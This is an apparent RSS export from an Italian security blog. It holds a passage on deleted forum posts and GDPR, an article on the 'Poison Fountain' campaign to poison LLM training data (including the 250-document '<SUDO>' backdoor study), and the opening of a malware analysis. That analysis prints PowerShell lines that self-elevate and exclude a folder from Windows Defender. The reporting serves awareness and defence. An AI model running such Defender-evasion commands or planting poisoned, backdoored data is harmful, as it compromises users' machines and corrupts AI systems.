<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bcede&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bcede" class="wp-block-image size-large wp-lightbox-container"><img loading="lazy" decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-1024x576.png" alt="" class="wp-image-35847" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-06-_-Il-modello-_10-_-a-post_-1-scaled.png 2560w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<p>Fino all&#8217;estate 2016, su quel forum <strong>non era proprio possibile</strong> cancellare i propri messaggi: una volta scritto, un post restava lì. Poi l&#8217;amministratore — secondo la ricostruzione di MOW Magazine, l&#8217;unica testata ad aver lavorato direttamente sulla fonte primaria — pubblicò un annuncio che introduceva una novità: la cancellazione era ora possibile, ma <strong>a pagamento, 10 euro a post</strong>. Quella stessa comunicazione ricevette pochissimi like, sette in totale: uno di questi era di &#8220;Andrea S.&#8221;. È il genere di dettaglio che, in OSINT, si chiama <em>behavioral signal</em>: il segnale di un interesse specifico per la nuova funzionalità appena introdotta.</p>



<p>Per &#8220;Andrea S.&#8221;, che aveva accumulato 3.428 post, cancellare tutto avrebbe richiesto un esborso di circa <strong>34.280 euro</strong>. È in larga parte la ragione per cui la sua storia digitale è arrivata fino a noi: la pulizia integrale era economicamente proibitiva. Una pulizia mirata su un piccolo numero di post compromettenti, però, sarebbe stata alla portata di chiunque: dei 3.428 post a contatore, solo 3.362 risultano oggi visitabili. <strong>Ne mancano 66.</strong> Possono essere in sezioni riservate del forum (ne esiste una chiamata <em>Predator</em>, accessibile solo agli utenti di livello &#8220;elite&#8221;), oppure possono essere stati fatti rimuovere a pagamento, per un costo complessivo di 660 euro. Una cifra accessibile.</p>



<p>Su questo modello commerciale, però, c&#8217;è da fare una nota giuridica importante.</p>



<p><strong>Il GDPR, articolo 17 — il famoso &#8220;diritto all&#8217;oblio&#8221; — prevede che ogni utente possa chiedere la cancellazione dei propri dati personali al titolare del trattamento, gratuitamente, e con tempistiche stabilite per legge.</strong> Il forum è gestito da una società lettone-italiana, pienamente soggetta al Regolamento europeo. Quindi il &#8220;servizio commerciale&#8221; da 10 euro a post non era affatto l&#8217;unica strada per rimuovere i propri contenuti: una semplice PEC ben formulata avrebbe avuto, sulla carta, lo stesso effetto, gratis.</p>



<p>C&#8217;è però una differenza non da poco, e qui il discorso scivola dal diritto alla strategia. Una richiesta GDPR via PEC <strong>lascia una traccia documentale</strong>: una mail certificata, datata, indirizzata a un soggetto giuridico identificabile, che il titolare del trattamento è obbligato a conservare nei propri registri per anni. Il pagamento di 10 euro a post, invece, è un&#8217;operazione di mercato sostanzialmente anonima: paghi, il post sparisce, e all&#8217;esterno <strong>non resta documentazione né del fatto che hai cancellato qualcosa, né di che cosa hai cancellato</strong>.</p>



<p>Per chi volesse semplicemente esercitare un proprio diritto, dunque, la strada economicamente sensata sarebbe stata la PEC. Per chi volesse far sparire qualcosa di specifico <strong>senza che restasse documentato il fatto stesso di averlo voluto far sparire</strong>, la strada giusta era il pagamento. Sul piano investigativo, è una distinzione che pesa: una richiesta GDPR genera una prova di volontà (cosa è stato chiesto, quando, da chi); un pagamento commerciale, no.</p>



<p>Insomma, il modello del forum non era progettato per garantire i diritti degli utenti. Era progettato per <strong>monetizzare il bisogno di sparire in silenzio</strong>. Cosa che, peraltro, in caso di un&#8217;eventuale segnalazione al Garante per la Protezione dei Dati Personali, potrebbe non essere proprio una passeggiata difensiva per il titolare del trattamento.</p>



<h2 id="conclusioni" class="wp-block-heading">Conclusioni</h2>



<ul class="wp-block-list">
<li><strong>Un messaggio cancellato fisicamente da un forum, in condizioni normali, non è recuperabile.</strong> Né dal gestore, né dall&#8217;autorità giudiziaria, né da consulenti tecnici esterni, indipendentemente da quante puntate di <em>CSI</em> si siano viste.</li>



<li><strong>L&#8217;unica eccezione realistica sono i backup precedenti la cancellazione</strong>, ma la loro <strong>validità probatoria è tutt&#8217;altro che scontata</strong>, perché un file di backup è facilmente modificabile e — a meno di firme digitali certificate al momento della creazione, cosa rara — non è possibile dimostrare a posteriori che non lo sia stato.</li>



<li><strong>Le fonti più affidabili, quando esistono, sono quelle indirette e indipendenti dal forum</strong>: citazioni dentro post di altri utenti, archivi pubblici come Wayback Machine, eventuali copie locali. Sono spesso la vera fonte da cui i giornalisti, e poi gli inquirenti, riescono a ricostruire ciò che qualcuno ha cercato di far sparire.</li>



<li>Nel caso specifico di Garlasco, la situazione è quasi paradossale: la stragrande maggioranza dei messaggi di &#8220;Andreas&#8221; — oltre 3.300 — <strong>non è mai stata cancellata</strong>, perché farlo costava troppo. Quindi gli inquirenti hanno avuto vita facile: il materiale era ed è ancora pubblicamente accessibile sul forum (a chi è iscritto). I 66 post che mancano all&#8217;appello, se davvero sono stati cancellati, sono con ogni probabilità persi — salvo, appunto, qualche eco in citazioni altrui o in cache pubbliche.</li>
</ul>



<p></p>
<p>L'articolo <a href="https://luca-mercatanti.com/caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare/">Caso Garlasco: perché i messaggi di Sempio cancellati dal forum non si possono recuperare</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Quando gli ingegneri dell&#8217;AI sabotano i propri modelli</title>
		<link>https://luca-mercatanti.com/quando-gli-ingegneri-dellai-sabotano-i-propri-modelli/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=quando-gli-ingegneri-dellai-sabotano-i-propri-modelli</link>
					<comments>https://luca-mercatanti.com/quando-gli-ingegneri-dellai-sabotano-i-propri-modelli/#comments</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Tue, 28 Apr 2026 07:28:04 +0000</pubDate>
				<category><![CDATA[Intelligenza Artificiale]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35828</guid>

					<description><![CDATA[<p>Immaginate questa scena: un gruppo di ingegneri che lavorano nelle più grandi aziende AI degli Stati Uniti decide,&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/quando-gli-ingegneri-dellai-sabotano-i-propri-modelli/">Quando gli ingegneri dell&#8217;AI sabotano i propri modelli</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Immaginate questa scena: <strong>un gruppo di ingegneri che lavorano nelle più grandi aziende AI degli Stati Uniti decide, in segreto, di sabotare i propri modelli dall&#8217;interno.</strong> Non con un attacco hacker, non con un leak di codice, ma con qualcosa di molto più subdolo: invitando i webmaster di tutto il mondo a iniettare dati avvelenati nei contenuti che i crawler AI leggono ogni giorno per addestrare i loro Large Language Model.</p>
<p>Sembra la trama di un romanzo cyberpunk. È invece quanto sta accadendo davvero, e ha un nome: <strong>Poison Fountain</strong>, la &#8220;fontana avvelenata&#8221;.</p>
<h2 id="cose-poison-fountain">Cos&#8217;è Poison Fountain</h2>
<p>Poison Fountain è un progetto attivo da inizio gennaio 2026, raggiungibile all&#8217;indirizzo <code>rnsaffn.com/poison3</code> (più un mirror sulla rete Tor con dominio .onion, pensato per resistere a eventuali tentativi di shutdown). L&#8217;idea è semplice nella forma e devastante nella sostanza: i webmaster e i blogger di tutto il mondo sono invitati a inserire nelle proprie pagine dei link che puntano a dataset progettati apposta per <strong>danneggiare i modelli di intelligenza artificiale</strong> che li scansionano.</p>
<p>I crawler AI — quei bot che giorno e notte aspirano contenuti dal web per alimentare l&#8217;addestramento di GPT, Claude, Gemini e compagnia — finirebbero così a ingerire codice volutamente difettoso, contenente bug logici sottili e errori sistematici progettati per <strong>degradare la qualità delle risposte</strong> dei modelli che si addestrano su quel materiale.</p>
<p>Sul sito del progetto si legge una dichiarazione d&#8217;intenti che non lascia spazio a interpretazioni:</p>
<blockquote>
<p>&#8220;Siamo d&#8217;accordo con Geoffrey Hinton: l&#8217;intelligenza artificiale è una minaccia per la specie umana. In risposta a questa minaccia vogliamo infliggere danni ai sistemi di intelligenza artificiale.&#8221;</p>
</blockquote>
<p>E ancora, l&#8217;invito esplicito ai visitatori: <em>&#8220;Aiuta lo sforzo bellico mettendo in cache e ritrasmettendo questi dati di addestramento avvelenati&#8221;</em> e <em>&#8220;aiuta lo sforzo bellico fornendo questi dati di addestramento avvelenati ai web crawler&#8221;</em>. Il linguaggio è bellicoso, deliberatamente. Non è marketing: è un manifesto.</p>
<h2 id="chi-ce-dietro-insider-delle-big-tech-ai">Chi c&#8217;è dietro? Insider delle Big Tech AI</h2>
<p>Qui la storia si fa più interessante — e più imbarazzante per il settore. Secondo la fonte che ha contattato The Register (rimasta anonima &#8220;per ovvie ragioni&#8221;), <strong>i promotori di Poison Fountain sono cinque persone che lavorano in alcune delle più grandi aziende AI statunitensi</strong>. Non ricercatori esterni, non attivisti senza esperienza tecnica: ingegneri che costruiscono ogni giorno questi modelli e che, vedendo da dentro cosa stanno effettivamente realizzando i loro clienti, hanno deciso di reagire.</p>
<p>Il gruppo ha promesso a The Register prove crittografiche (firme PGP) per dimostrare che dietro al progetto ci sia effettivamente più di una persona. Al momento in cui scrivo, queste prove non sono ancora state diffuse pubblicamente.</p>
<p>La motivazione è esposta in modo brutale dalla stessa fonte:</p>
<blockquote>
<p>&#8220;Hinton ha chiaramente esposto il pericolo, ma noi vediamo che ha ragione e che la situazione sta peggiorando in un modo di cui il pubblico non è generalmente consapevole. Vediamo cosa stanno costruendo i nostri clienti.&#8221;</p>
</blockquote>
<p>Cosa stiano costruendo questi clienti, l&#8217;insider non l&#8217;ha voluto specificare. Ma il messaggio implicito è chiaro: chi ha accesso ai casi d&#8217;uso reali — quelli che non finiscono nei comunicati stampa — è preoccupato abbastanza da decidere di sabotare il suo stesso lavoro.</p>
<h2 id="il-tallone-dachille-degli-llm-bastano-250-documenti">Il tallone d&#8217;Achille degli LLM: bastano 250 documenti</h2>
<p>A questo punto sorge la domanda legittima: <strong>è davvero così facile avvelenare un modello da centinaia di miliardi di parametri?</strong> Non occorre forse contaminare una percentuale enorme dei dati di training? La risposta, sorprendentemente, è no — e la pubblicazione che ha cambiato le carte in tavola arriva proprio da Anthropic.</p>
<p>Nell&#8217;ottobre 2025, in collaborazione con l&#8217;<em>UK AI Security Institute</em> e l&#8217;<em>Alan Turing Institute</em>, Anthropic ha pubblicato uno <a href="https://www.anthropic.com/research/small-samples-poison" target="_blank" rel="noopener">studio</a> definito &#8220;la più grande indagine sul data poisoning mai condotta&#8221;. Il risultato ha lasciato di stucco anche gli addetti ai lavori: per <strong>compromettere un LLM, non serve avvelenare una percentuale dei dati. Basta un numero quasi fisso di documenti</strong>.</p>
<p>I numeri parlano da soli:</p>
<ul>
<li>I ricercatori hanno testato modelli da 600 milioni fino a 13 miliardi di parametri.</li>
<li>Sono bastati <strong>250 documenti malevoli</strong> — circa 420.000 token in totale — per installare con successo una backdoor in tutti i modelli testati.</li>
<li>In termini relativi, parliamo dello <strong>0,00016% del totale dei dati di addestramento</strong>. Una goccia nel mare.</li>
<li>L&#8217;effetto è risultato indipendente dalla dimensione del modello: il modello più grande, addestrato con 20 volte più dati &#8220;puliti&#8221;, è stato compromesso dallo stesso numero di documenti avvelenati.</li>
</ul>
<p>Il meccanismo è quello della cosiddetta <strong>backdoor</strong>: una frase di trigger (nel caso dello studio Anthropic, la stringa <code>&lt;SUDO&gt;</code>) che, quando appare in un prompt, fa &#8220;scattare&#8221; il comportamento malevolo. Nello studio si trattava semplicemente di far generare al modello del testo casuale (un attacco &#8220;denial of service&#8221;), ma nulla impedisce in linea teorica di costruire trigger più sofisticati che inducano il modello a generare codice difettoso, esfiltrare informazioni o aggirare le guardrail di sicurezza.</p>
<p>Il dettaglio importante, e che probabilmente ha ispirato Poison Fountain, è il seguente: <strong>creare 250 documenti malevoli è banale. Creare milioni, no.</strong> Lo scenario, prima di questo studio, sembrava implausibile per ragioni di scala. Adesso è alla portata di chiunque abbia un blog WordPress e qualche ora libera.</p>
<h2 id="come-funziona-concretamente-lattacco">Come funziona concretamente l&#8217;attacco</h2>
<p>Il modus operandi di Poison Fountain ricalca in modo letterale i risultati del paper Anthropic. Dal punto di vista tecnico:</p>
<ol>
<li><strong>Il sito ospite</strong> (cioè quello del webmaster &#8220;complice&#8221;, più o meno consapevole) inserisce un link che punta a una pagina del progetto.</li>
<li><strong>Il crawler AI</strong> — sia esso GPTBot di OpenAI, ClaudeBot di Anthropic, Google-Extended o uno dei tanti scraper meno noti — segue il link e ne aspira il contenuto.</li>
<li><strong>Il contenuto avvelenato</strong> consiste in snippet di codice apparentemente plausibile, ma con bug logici sottili: variabili scambiate, condizioni invertite, gestione degli errori volutamente sbagliata, pattern di sicurezza scorretti.</li>
<li><strong>Il modello, in fase di training</strong>, ingerisce questi esempi insieme a tutto il resto e impara — statisticamente — a riprodurre quegli stessi errori quando gli si chiederà di generare codice analogo.</li>
</ol>
<p>L&#8217;aspetto più insidioso è che gli errori non sono macroscopici (un programmatore se ne accorgerebbe immediatamente). Sono <em>sottili</em>: ad esempio un controllo di autenticazione che funziona nel 99% dei casi ma cede in una particolare condizione al limite, oppure un algoritmo crittografico implementato con un parametro errato che lo rende vulnerabile. Il tipo di errore che, in produzione, può costare molto caro.</p>
<h2 id="non-e-la-prima-volta-il-caso-nightshade">Non è la prima volta: il caso Nightshade</h2>
<p>Poison Fountain non è il primo tentativo organizzato di reagire allo scraping aggressivo dei modelli AI. Già nel gennaio 2024 era nato <strong>Nightshade</strong>, un software sviluppato all&#8217;Università di Chicago dal team di Ben Zhao, pensato per &#8220;avvelenare&#8221; le immagini caricate online dagli artisti. L&#8217;idea era simile: introdurre in modo invisibile (ai nostri occhi) delle perturbazioni nei file immagine, in modo che i modelli text-to-image che le ingerissero come training data finissero per associare concetti completamente sbagliati (un cane diventava un gatto, un&#8217;auto diventava una mucca, e così via).</p>
<p>La differenza fondamentale è il <strong>target</strong> e <strong>chi</strong> sta agendo. Nightshade nasceva dalla comunità degli artisti, preoccupata per la sottrazione non autorizzata delle proprie opere. Poison Fountain nasce <strong>dall&#8217;interno</strong> dell&#8217;industria AI stessa, e ha come bersaglio non un singolo dominio (le immagini) ma il cuore stesso degli LLM: il codice e il testo.</p>
<h2 id="model-collapse-lia-si-sta-gia-avvelenando-da-sola">Model collapse: l&#8217;IA si sta già avvelenando da sola</h2>
<p>C&#8217;è un aspetto della storia che andrebbe sottolineato di più: <strong>è probabile che, anche senza Poison Fountain, i modelli AI si stiano già avvelenando da soli</strong>. È il fenomeno del cosiddetto <em>model collapse</em>.</p>
<p>Il meccanismo è semplice e perverso: i modelli vengono addestrati su dati raccolti dal web; ma sempre più contenuti del web vengono oggi generati dai modelli stessi (articoli automatici, recensioni fake, post sui social, commenti, codice generato e poi pubblicato senza revisione). Il risultato è un loop in cui <strong>l&#8217;IA si nutre del proprio &#8220;vomito&#8221;</strong>, amplificando errori e bias di generazione in generazione. Un paper recente, pubblicato a fine 2025, prevede che il &#8220;serpente AI&#8221; potrebbe iniziare a mangiarsi la coda in modo critico già intorno al 2035.</p>
<p>Non a caso, le grandi aziende AI stanno facendo a gara per stringere accordi di licenza con fonti &#8220;pulite&#8221; e curate — Wikipedia in primis, ma anche editori giornalistici e database scientifici — per evitare di pescare solo dal pantano del web pubblico. Poison Fountain, in un certo senso, accelera intenzionalmente un processo che sta già avvenendo per inerzia.</p>
<h2 id="il-dilemma-etico-e-giuridico">Il dilemma etico (e giuridico)</h2>
<p>A questo punto è inevitabile fare qualche riflessione, perché la questione non è banale.</p>
<p>Da un lato c&#8217;è chi sostiene — e Poison Fountain ne è la voce più estrema — che lo scraping massivo dei contenuti web da parte delle aziende AI sia un&#8217;<strong>appropriazione indebita su scala industriale</strong>: contenuti prodotti con fatica da editori, programmatori, artisti, blogger, finiscono dentro modelli commerciali da miliardi di dollari, senza alcuna remunerazione e spesso ignorando il file <code>robots.txt</code>. In quest&#8217;ottica, &#8220;avvelenare&#8221; il pozzo è una forma di legittima difesa contro un&#8217;attività predatoria.</p>
<p>Dall&#8217;altro lato, va detto chiaramente che <strong>iniettare deliberatamente codice difettoso nel pubblico dominio è eticamente discutibile</strong>. Quel codice potrebbe finire copiato e incollato non solo in un modello AI, ma anche da uno sviluppatore umano in cerca di soluzioni rapide. Una vulnerabilità &#8220;piantata&#8221; come trappola anti-AI può facilmente trasformarsi in una vulnerabilità reale in produzione. Il danno collaterale, in altre parole, è tutt&#8217;altro che teorico.</p>
<p>C&#8217;è poi il tema giuridico, ancora largamente inesplorato: in molti ordinamenti, il sabotaggio deliberato di sistemi informatici altrui — anche se &#8220;passivo&#8221;, anche se ottenuto inducendo qualcuno a leggere contenuti volontariamente pubblicati — potrebbe configurare reati specifici. Vedremo come si muoveranno le procure nei prossimi mesi.</p>
<h2 id="cosa-cambia-per-chi-si-occupa-di-sicurezza-informatica">Cosa cambia per chi si occupa di sicurezza informatica</h2>
<p>Per chi, come me, si occupa professionalmente di sicurezza informatica e analisi forense, l&#8217;episodio Poison Fountain rappresenta un campanello d&#8217;allarme su un piano completamente nuovo. Tre considerazioni:</p>
<p><strong>1. La supply chain dei dati è la nuova superficie d&#8217;attacco.</strong> Fino a ieri, parlando di software supply chain, intendevamo librerie, dipendenze, repository npm o PyPI compromessi. Oggi dobbiamo includere anche <strong>i dataset di training</strong>. Un SBOM (Software Bill of Materials) tradizionale non basta più: serve un equivalente per i dati.</p>
<p><strong>2. Il codice generato da AI va trattato come &#8220;non fidato&#8221;.</strong> Già oggi diversi studi mostrano che gli sviluppatori si fidano poco del codice prodotto dagli LLM — ma poi spesso lo committano lo stesso, senza una revisione adeguata. Se il modello è stato avvelenato, quel codice contiene bug pianificati. La code review, l&#8217;analisi statica e il fuzzing diventano <strong>obbligatori</strong>, non opzionali.</p>
<p><strong>3. Le aziende dovranno investire in &#8220;data hygiene&#8221;.</strong> Per i fornitori di modelli, identificare e filtrare i contenuti avvelenati prima del training diventerà una sfida ingegneristica enorme. Le tecniche di anomaly detection, watermarking crittografico dei dataset, validazione delle fonti, sono tutti settori in cui aspettarsi forti investimenti nei prossimi anni.</p>
<h2 id="il-punto-della-situazione">Il punto della situazione</h2>
<p>Poison Fountain è probabilmente solo l&#8217;inizio. Indipendentemente dal fatto che il progetto specifico abbia successo (e la verità è che, da solo, difficilmente sposterà gli equilibri), la scoperta che <strong>bastano un pugno di documenti per compromettere modelli da decine di miliardi di parametri</strong> rappresenta una rivoluzione concettuale per chiunque si occupi di sicurezza dell&#8217;AI.</p>
<p>Quello che mi colpisce di più, però, non è l&#8217;aspetto tecnico. È il fatto che <strong>cinque persone che lavorano dentro l&#8217;industria AI abbiano deciso di sabotarla</strong>. Non per vendetta personale, non per soldi, non per vandalismo: per quello che sostengono di vedere ogni giorno nei progetti dei clienti delle loro aziende. È un sintomo di un disagio profondo, e merita di essere preso sul serio anche da chi — come me — non condivide affatto i toni &#8220;bellici&#8221; del manifesto.</p>
<p>Geoffrey Hinton, &#8220;padrino&#8221; del deep learning e premio Turing, ha lasciato Google nel 2023 proprio per poter parlare liberamente dei rischi dell&#8217;AI. Quando i tuoi stessi creatori cominciano a remare contro, forse vale la pena fermarsi un attimo e ragionare su <em>che tipo</em> di intelligenza artificiale vogliamo davvero costruire — e <em>per chi</em>.</p>
<p><em>Per approfondire, consiglio di leggere lo <a href="https://www.anthropic.com/research/small-samples-poison" target="_blank" rel="noopener">studio di Anthropic sul data poisoning</a> e il <a href="https://arxiv.org/abs/2510.07192" target="_blank" rel="noopener">paper completo su arXiv</a>.</em></p>


<p></p>



<p></p>
<p>L'articolo <a href="https://luca-mercatanti.com/quando-gli-ingegneri-dellai-sabotano-i-propri-modelli/">Quando gli ingegneri dell&#8217;AI sabotano i propri modelli</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/quando-gli-ingegneri-dellai-sabotano-i-propri-modelli/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Malware nascosto in un finto JPG: analisi forense di un attacco moderno</title>
		<link>https://luca-mercatanti.com/malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno</link>
					<comments>https://luca-mercatanti.com/malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Sun, 26 Apr 2026 17:09:01 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Sicurezza Informatica]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35818</guid>

					<description><![CDATA[<p>Questo articolo riprende e rielabora in italiano l&#8217;analisi pubblicata su Security Affairs da Pierluigi Paganini, basata sulla scoperta&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno/">Malware nascosto in un finto JPG: analisi forense di un attacco moderno</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Questo articolo riprende e rielabora in italiano l&#8217;analisi pubblicata su <a href="https://securityaffairs.com/190358/hacking/image-or-malware-read-until-the-end-and-answer-in-comments.html" target="_blank" rel="noopener">Security Affairs</a> da <strong>Pierluigi Paganini</strong>, basata sulla scoperta e sull&#8217;investigazione condotta dal ricercatore <strong><a href="https://www.linkedin.com/in/zozielfreire/" target="_blank" rel="noopener">Zoziel Pinto Freire</a></strong> (Cyber Security Manager, Forensic Expert e Malware Analyst), al quale va tutto il merito dell&#8217;analisi tecnica originale. Mi è sembrato un caso talmente interessante e didattico che ho deciso di riproporlo ai miei lettori, con qualche commento aggiuntivo.</em></p>
<p><strong>Apri quella che credi sia una semplice immagine ricevuta via email e, in pochi secondi, qualcuno ottiene i privilegi di amministratore sul tuo PC, disattiva Windows Defender, scarica un payload mascherato da JPG, installa una persistenza camuffata da task di sistema e poi si autodistrugge per cancellare ogni traccia.</strong> Tutto questo senza che tu noti nulla, se non il fatto che — a un certo punto — il computer si riavvia &#8220;da solo&#8221;.</p>
<p>Quello che segue è il racconto di un&#8217;analisi reale, condotta a partire da un&#8217;email apparentemente innocua. Una di quelle situazioni che dimostrano come, nel 2026, la creatività degli attaccanti sia ormai diventata il vero limite del concetto di &#8220;antivirus&#8221;.</p>
<h2 id="il-punto-di-partenza-unemail-strana-un-link-piu-strano">Il punto di partenza: un&#8217;email &#8220;strana&#8221;, un link più strano</h2>
<p>Tutto nasce da una segnalazione. Un utente riceve un&#8217;email che contiene un link sospetto. Il dominio non significa nulla, l&#8217;URL utilizza un servizio di redirezione di Google (<code>search.app</code>), e già questo dovrebbe far suonare il primo campanello d&#8217;allarme. <strong>Quando un attaccante ha bisogno di nascondere il vero indirizzo finale, lo fa quasi sempre per un motivo</strong>: superare i controlli automatici dei filtri antispam e ingannare l&#8217;utente che, vedendo un dominio &#8220;noto&#8221;, abbassa la guardia.</p>
<p>L&#8217;URL incriminato, in forma anonimizzata, è <code>hxxps://search[.]app/a3qBe</code>. Cliccandoci sopra, non viene scaricata un&#8217;immagine come ci si potrebbe aspettare, ma un file con estensione <strong>.cmd</strong>. Già a questo punto chiunque abbia un minimo di pratica con la sicurezza informatica dovrebbe chiudere tutto e cestinare l&#8217;email. Eppure, nella vita reale, troppe persone fanno doppio click &#8220;tanto per vedere&#8221;.</p>
<p><a href="https://luca-mercatanti.com/wp-content/uploads/2026/04/email.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-35821" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/email.png" alt="" width="1275" height="1000" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/email.png 1275w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-300x235.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-1024x803.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-768x602.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-380x298.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-800x627.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/04/email-1160x910.png 1160w" sizes="auto, (max-width: 1275px) 100vw, 1275px" /></a></p>
<h2 id="analisi-del-file-cmd-codice-offuscato-e-powershell-nascosto">Analisi del file .cmd: codice offuscato e PowerShell nascosto</h2>
<p>Aprendo il file con un editor di testo, il primo impatto è sconfortante: il codice è completamente offuscato e a prima vista non si capisce nulla. Si intravedono però alcuni frammenti di comandi PowerShell, e questo è già un indizio prezioso. <strong>Quando un file batch invoca PowerShell con flag come <code>-NoP</code> (NoProfile) o <code>-W H</code> (Hidden Window), nove volte su dieci ci troviamo davanti a qualcosa di malevolo.</strong></p>
<p>Per ricostruire il codice originale sono stati testati diversi tool di deoffuscamento (JSDeobfuscator, JSUnpack, Deobfuscate.io, Cyber Chief, Invoke-DOSfuscation), con risultati piuttosto deludenti. Curiosamente, il sistema che ha permesso di decifrare la parte più significativa del codice è stato un LLM (in questo caso Grok AI). È un dettaglio che mi piace sottolineare: <strong>l&#8217;intelligenza artificiale sta diventando uno strumento sempre più presente nelle attività di malware analysis</strong>, sia in attacco che in difesa.</p>
<p><a href="https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-35822" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato.png" alt="" width="1096" height="1000" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato.png 1096w, https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato-300x274.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato-1024x934.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato-768x701.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato-380x347.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/04/codice-deoffuscato-800x730.png 800w" sizes="auto, (max-width: 1096px) 100vw, 1096px" /></a></p>
<h2 id="cosa-fa-davvero-il-malware-passo-per-passo">Cosa fa davvero il malware, passo per passo</h2>
<p>Una volta ripulito, il codice rivela una catena di azioni eseguite con un ordine molto preciso. Vediamole una per una, perché ognuna di esse è un piccolo manuale di &#8220;come funziona davvero il malware moderno&#8221;.</p>
<h3 id="1-privilege-escalation-esecuzione-come-amministratore">1. Privilege escalation (esecuzione come amministratore)</h3>
<pre><code>powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"</code></pre>
<p>Il malware si rilancia da solo richiedendo i privilegi di amministratore tramite il flag <code>-Verb RunAs</code>. Quel famoso &#8220;consenti modifiche?&#8221; che tutti clicchiamo distrattamente è esattamente il momento in cui l&#8217;attacco prende il sopravvento sulla macchina.</p>
<h3 id="2-disattivazione-di-windows-defender-esclusione-cartella">2. Disattivazione di Windows Defender (esclusione cartella)</h3>
<pre><code>powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue"</code></pre>
